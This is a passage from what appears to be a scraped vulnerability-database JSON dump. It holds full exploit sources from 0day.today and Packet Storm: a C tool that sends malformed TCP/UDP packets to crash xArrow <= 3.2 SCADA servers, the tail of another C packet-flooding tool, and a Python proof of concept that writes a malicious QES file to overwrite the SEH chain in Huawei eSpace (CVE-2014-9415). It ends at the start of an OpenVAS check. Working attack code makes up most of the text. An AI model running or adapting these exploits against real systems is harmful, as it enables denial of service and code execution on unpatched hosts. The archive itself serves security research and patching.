SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, 0x4b2, fill, f - fill);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- malformed packets: \");\r\n for(i = 0; i < 10; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, type, buff, p - buff);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz) {\r\n static u8 buff[BUFFSZ];\r\n static int pck = 1;\r\n int t;\r\n u8 *p;\r\n\r\n t = 4 + 4 + 4 + datasz;\r\n if(t > (BUFFSZ - 12)) t = BUFFSZ - 12;\r\n\r\n p = buff;\r\n p += putxx(p, 1, 16);\r\n p += putxx(p, htons(pck++), 16);\r\n p += putxx(p, htonl(1), 32);\r\n p += putxx(p, htonl(t), 32);\r\n\r\n p += putxx(p, 1, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, type, 32);\r\n if(datasz > 0) p += putmm(p, data, datasz);\r\n\r\n if(send(sd, buff, p - buff, 0) < 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n\r\n p = data;\r\n if(len < 0xff) {\r\n p += putxx(p, len, 8);\r\n } else {\r\n p += putxx(p, 0xff, 8);\r\n p += putxx(p, len, 16);\r\n }\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int size) {\r\n memset(data, chr, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18890"}, {"lastseen": "2018-01-04T17:10:36", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-07-01T00:00:00", "published": "2012-07-01T00:00:00", "id": "1337DAY-ID-18884", "href": "https://0day.today/exploit/description/18884", "type": "zdt", "title": "xArrow <= 3.2 multiple vulnerabilities", "sourceData": "-------------\r\n winerr.h\r\n-------------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n-------------\r\n xarrow_1.c\r\n-------------\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n#include <zlib.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 8192 // max for recvfrom\r\n#define MAXZIPLEN(n)((n)+(((n)/1000)+1)+12)\r\n\r\n\r\n\r\nint create_socket(int type, struct sockaddr_in *peer);\r\nint xarrow_send_header(int sd, u32 zsize, u32 size);\r\nint xarrow_send(int sd, u8 *buff, u32 size);\r\nint xarrow_recv(int sd, u8 *buff, u32 buffsz);\r\nint tcp_recv(int sd, u8 *buff, int len);\r\nint putmm(u8 *data, u8 *mem, int len);\r\nint putcc(u8 *data, int chr, int len);\r\nint getxx(u8 *data, u32 *ret, int bits);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n len;\r\n u16 port = 1975;\r\n u8 *buff,\r\n *host,\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"xArrow <= 3.2 multiple vulnerabilities \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \"1 = decompression NULL pointer\\n\"\r\n \"2 = heap corruption\\n\"\r\n \"3 = invalid read access (udp port %d)\\n\"\r\n \"4 = memory corruption (udp port %d)\\n\"\r\n \"\\n\", argv[0], port,\r\n port - 1,\r\n port - 1);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n if(bug == 1) {\r\n sd = create_socket(IPPROTO_TCP, &peer);\r\n\r\n if(xarrow_send_header(sd, -1, 100) < 0) goto quit;\r\n\r\n p = buff;\r\n p += putcc(p, 'a', 100);\r\n if(send(sd, buff, p - buff, 0) < 0) goto quit;\r\n\r\n } else if(bug == 2) {\r\n sd = create_socket(IPPROTO_TCP, &peer);\r\n\r\n for(i = 0; i < 200; i++) {\r\n if(xarrow_send(sd, NULL, 0) < 0) goto quit;\r\n }\r\n\r\n } else if(bug == 3) {\r\n peer.sin_port = htons(ntohs(peer.sin_port) - 1);\r\n sd = create_socket(IPPROTO_UDP, &peer);\r\n\r\n p = buff;\r\n p += putxx(p, 0xffffffff, 32);\r\n p += putcc(p, 0, 6);\r\n p += putxx(p, !0, 32);\r\n p += putxx(p, 4, 16);\r\n p += putxx(p, 1, 16);\r\n p += putcc(p, 0, 20);\r\n p += putxx(p, 0x7f000001, 32); // 127.0.0.1, needed!\r\n p += putcc(p, 0, 10);\r\n p += putxx(p, 0xfffd, 16); // ((num << 4) + 0x20) & 0xffff\r\n p += putcc(p, 0, 64);\r\n\r\n printf(\"- send %d bytes\\n\", p - buff);\r\n for(i = 0; i < 3; i++) {\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n }\r\n goto quit;\r\n\r\n } else if(bug == 4) {\r\n peer.sin_port = htons(ntohs(peer.sin_port) - 1);\r\n sd = create_socket(IPPROTO_UDP, &peer);\r\n\r\n // all fields set to zero because they are not necessary\r\n p = buff;\r\n p += putxx(p, 0, 32);\r\n p += putcc(p, 0, 6);\r\n p += putxx(p, !0, 32);\r\n p += putxx(p, 4, 16);\r\n p += putxx(p, 1, 16);\r\n p += putcc(p, 0, 20);\r\n p += putxx(p, 0x7f000001, 32); // 127.0.0.1, needed!\r\n p += putcc(p, 0, 10);\r\n p += putxx(p, 0, 16);\r\n p += putcc(p, 0, BUFFSZ - (p - buff));\r\n putxx(buff, (p - buff) - 0x16, 32); // correct size\r\n\r\n printf(\"- send %d bytes\\n\", p - buff);\r\n for(i = 0; i < 3; i++) {\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n }\r\n goto quit;\r\n\r\n } else {\r\n printf(\"\\nError: invalid bug number (%d)\\n\", bug);\r\n exit(1);\r\n }\r\n\r\n for(;;) {\r\n len = xarrow_recv(sd, buff, BUFFSZ);\r\n if(len < 0) goto quit;\r\n }\r\n\r\nquit:\r\n printf(\"- done\\n\");\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint create_socket(int type, struct sockaddr_in *peer) {\r\n static struct linger ling = {1,1};\r\n static int on = 1;\r\n int sd;\r\n\r\n if(type == IPPROTO_TCP) {\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))\r\n < 0) std_err();\r\n printf(\"- connected\\n\");\r\n } else {\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n }\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));\r\n setsockopt(sd, IPPROTO_TCP, TCP_NODELAY, (char *)&on, sizeof(on));\r\n return(sd);\r\n}\r\n\r\n\r\n\r\nint xarrow_send_header(int sd, u32 zsize, u32 size) {\r\n int i;\r\n u8 header[6 + 12],\r\n *p;\r\n\r\n p = header;\r\n for(i = 0; i < 3; i++) {\r\n *p++ = 0xeb;\r\n *p++ = 0x90;\r\n }\r\n p += putxx(p, zsize, 32);\r\n p += putxx(p, size, 32);\r\n p += putxx(p, 0xeb90d709, 32);\r\n for(i = 6; i < sizeof(header); i++) {\r\n header[i] ^= 0x50 ^ 0x65 ^ 0x69; // yeah 0x5c\r\n }\r\n if(send(sd, header, sizeof(header), 0) != sizeof(header)) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint xarrow_send(int sd, u8 *buff, u32 size) {\r\n static u8 *zbuff = NULL;\r\n uLongf zsize;\r\n\r\n zsize = MAXZIPLEN(size);\r\n zbuff = realloc(zbuff, zsize);\r\n if(!zbuff) std_err();\r\n //if(!buff || !size) // compress it anyway!\r\n if(compress2(zbuff, &zsize, buff, size, 9) != Z_OK) return(-1);\r\n if(xarrow_send_header(sd, zsize, size) < 0) return(-1);\r\n if(send(sd, zbuff, zsize, 0) != zsize) return(-1);\r\n printf(\"- %u -> %u bytes sent\\n\", size, (u32)zsize);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint xarrow_recv(int sd, u8 *buff, u32 buffsz) {\r\n static u8 *zbuff = NULL;\r\n uLongf tmp;\r\n u32 zsize,\r\n size,\r\n type;\r\n int i;\r\n u8 header[6 + 12],\r\n *p;\r\n\r\n if(tcp_recv(sd, header, sizeof(header)) < 0) return(-1);\r\n p = header;\r\n for(i = 0; i < 3; i++) {\r\n if(*p != 0xeb) return(-2); p++;\r\n if(*p != 0x90) return(-3); p++;\r\n }\r\n for(i = 6; i < sizeof(header); i++) {\r\n header[i] ^= 0x5c;\r\n }\r\n p += getxx(p, &zsize, 32);\r\n p += getxx(p, &size, 32);\r\n p += getxx(p, &type, 32);\r\n if(type == 0xeb90d709) {\r\n if(zsize > buffsz) return(-4);\r\n zbuff = realloc(zbuff, zsize);\r\n if(!zbuff) std_err();\r\n if(tcp_recv(sd, zbuff, zsize) < 0) return(-5);\r\n tmp = size;\r\n if(uncompress(buff, &tmp, zbuff, zsize) != Z_OK) return(-6);\r\n } else { // in reality here it gets just rejected\r\n if(size > buffsz) return(-4);\r\n if(tcp_recv(sd, buff, size) < 0) return(-5);\r\n }\r\n printf(\"- %u -> %u bytes received\\n\", zsize, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint tcp_recv(int sd, u8 *buff, int len) {\r\n int t;\r\n u8 *p;\r\n\r\n for(p = buff; len; p += t, len -= t) {\r\n if(timeout(sd, 5) < 0) return(-1);\r\n t = recv(sd, p, len, 0);\r\n if(t <= 0) return(-1);\r\n }\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *mem, int len) {\r\n if(len < 0) len = strlen(mem) + 1;\r\n memcpy(data, mem, len);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int len) {\r\n memset(data, chr, len);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint getxx(u8 *data, u32 *ret, int bits) {\r\n u32 num;\r\n int i,\r\n bytes;\r\n\r\n if(bits <= 4) bytes = bits;\r\n else bytes = bits >> 3;\r\n for(num = i = 0; i < bytes; i++) {\r\n num |= (data[i] << (i << 3));\r\n }\r\n *ret = num;\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n if(bits <= 4) bytes = bits;\r\n else bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n }\r\n host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18884"}], "packetstorm": [{"lastseen": "2019-05-21T03:38:40", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-17T00:00:00", "published": "2019-05-17T00:00:00", "id": "PACKETSTORM:152965", "href": "https://packetstormsecurity.com/files/152965/Huawei-eSpace-1.1.11.103-Unicode-Stack-Buffer-Overflow.html", "title": "Huawei eSpace 1.1.11.103 Unicode Stack Buffer Overflow", "type": "packetstorm", "sourceData": "`#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n# \n# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite \n# \n# \n# Vendor: Huawei Technologies Co., Ltd. \n# Product web page: https://www.huawei.com \n# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) \n# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290 \n# Affected module: cenwpoll.dll 1.0.8.8 \n# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe \n# \n# Product description: \n# -------------------- \n# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of \n# products. Huawei\u2019s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides \n# users with easy and secure access to their service platform from any device, in any place, at any time. \n# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using \n# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed. \n# \n# Vulnerability description: \n# -------------------------- \n# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails \n# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when \n# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of \n# the affected application. Failed exploit attempts will likely result in denial-of-service conditions. \n# \n# Tested on: \n# ---------- \n# OS Name: Microsoft Windows 7 Professional \n# OS Version: 6.1.7601 Service Pack 1 Build 7601 \n# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz \n# \n# Vulnerability discovered by: \n# ---------------------------- \n# Gjoko 'LiquidWorm' Krstic \n# Senior STTE \n# SCD-ERC \n# Munich, Germany \n# 26th of August (Tuesday), 2014 \n# \n# PSIRT details: \n# -------------- \n# Security advisory No.: Huawei-SA-20141217- espace \n# Initial release date: Dec 17, 2014 \n# Vulnerability ID: HWPSIRT-2014-1151 \n# CVE ID: CVE-2014-9415 \n# Patched version: eSpace Meeting V100R001C03 \n# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589 \n# \n# \n# ------------------------------------ WinDBG output ------------------------------------ \n# \n# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance) \n# First chance exceptions are reported before any exception handling. \n# This exception may be expected and handled. \n# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045 \n# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc \n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 \n# *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll \n# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll - \n# cenwpoll!DllUnregisterServer+0xa59e: \n# 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=???????? \n# 0:008> !exchain \n# 02feccf4: *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe \n# *** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe \n# mcstub+10041 (00410041) \n# Invalid exception stack at 00410041 \n# Instruction Address: 0x0000000005790f3e \n# \n# Description: Exception Handler Chain Corrupted \n# Short Description: ExceptionHandlerCorrupted \n# Exploitability Classification: EXPLOITABLE \n# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b) \n# \n# Corruption of the exception handler chain is considered exploitable \n# \n# 0:008> d ebp \n# 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 0:008> u ebp \n# 02fecd00 41 inc ecx \n# 02fecd01 004100 add byte ptr [ecx],al \n# 02fecd04 41 inc ecx \n# 02fecd05 004100 add byte ptr [ecx],al \n# 02fecd08 41 inc ecx \n# 02fecd09 004100 add byte ptr [ecx],al \n# 02fecd0c 41 inc ecx \n# 02fecd0d 004100 add byte ptr [ecx],al \n# \n# ------------------------------------ /WinDBG output ------------------------------------ \n# \n# \n \nimport sys, os, time \n \nos.system('title jterm') \nos.system('color f5') \nos.system('cls') \npiton = os.path.basename(sys.argv[0]) \n \ndef usage(): \nprint ''' \n+---------------------------------------------+ \n| eSpace Meeting Stack Buffer Overflow Vuln | \n| | \n| Vuln ID: HWPSIRT-2014-1151 | \n| CVE ID: CVE-2014-9415 | \n+---------------------------------------------+ \n''' \nif len(sys.argv) < 2: \nprint 'Usage: \\n\\n\\t'+piton+' <OPTION>' \nprint '\\nOPTION:\\n' \nprint '\\t0 - Create the evil PoC file.' \nprint '\\t1 - Create the evil file, start the vulnerable application and crash it.' \nprint '\\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\\n' \nquit() \n \nusage() \ncrash = sys.argv[1] \n \ndir = os.getcwd(); \nfile = \"evilpoll.qes\" \nheader = '\\x56\\x34\\x78\\x12\\x01\\x00\\x09\\x00' # V4x..... \n \ntime.sleep(1) \n# Overwrite FS:[0] chain (\\x43 = EIP) \nbuffer = '\\x41' * 353 +'\\x42' * 2 +'\\x43' * 2 +'\\x44' * 42 +'New Poll' # \\x44 can be incremented (byte space for venetian shellcode) \nbuffer += '\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x90' \nbuffer += '\\x85\\xA9\\xD7\\x00\\x01\\x04\\x00' \nbuffer += 'TEST'+'\\x01\\x02\\x05\\x00' \nbuffer += 'ANSW1'+'\\x05\\x00' \nbuffer += 'ANSW2' \n \npoc = header + buffer \nbytes = len(poc) \n \nprint '[+] Creating evil PoC file...' \ntime.sleep(1) \nprint '[+] Buffering:\\n' \ntime.sleep(1) \n \nindex = 0 \nwhile index < len(poc): \nchar = poc[index] \n#print char, \nsys.stdout.write(char) \ntime.sleep(10.0 / 1000.0) \nindex = index + 1 \n \ntry: \nwriteFile = open (file, 'w') \nwriteFile.write( poc ) \nwriteFile.close() \ntime.sleep(1) \nprint '\\n\\n[+] File \\\"'+file+'\\\" successfully created!' \ntime.sleep(1) \nprint '[+] Location: \"'+dir+'\"' \nprint '[+] Wrote '+str(bytes)+' bytes.' \nexcept: \nprint '[-] Error while creating file!\\n' \n \nif crash == '0': \nprint '\\n\\n[+] Done!\\n' \nelif crash == '1': \nprint '[+] The script will now execute the vulnerable application with the PoC file as its argument.\\n' \nos.system('pause') \nos.system('C:\\\\Progra~1\\\\eSpace-ecs\\\\conf\\\\cwbin\\\\classreader.exe \"%~dp0evilpoll.qes\"') \nelif crash == '2': \nprint '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\\n' \nos.system('pause') \nos.system('C:\\\\Progra~1\\\\Debugg~1\\\\windbg.exe -Q -g -c \"!exchain\" -o \"C:\\\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe\" \"%~dp0evilpoll.qes\"') \nprint '\\n[+] You should see something like this in WinDBG:' \nprint ''' \n0:000> d 0012e37c \n0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D. \n0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. \n0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. \n0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. \n0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. \n0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e. \n0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l..... \n0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p....... \n0:000> !exchain \n0012e37c: 00430043 \nInvalid exception stack at 00420042 \n''' \nelse: \nprint '[+] Have a nice day! ^^\\n' \nquit() \n \nprint '\\n[+] Have a nice day! ^^\\n' \n#os.system('color 07') \n`\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152965/espace_epoll2.txt"}], "openvas": [{"lastseen": "2019-05-29T18:32:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310874620", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874620", "title": "Fedora Update for kernel FEDORA-2018-537c8312fc", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_537c8312fc_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-537c8312fc\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n 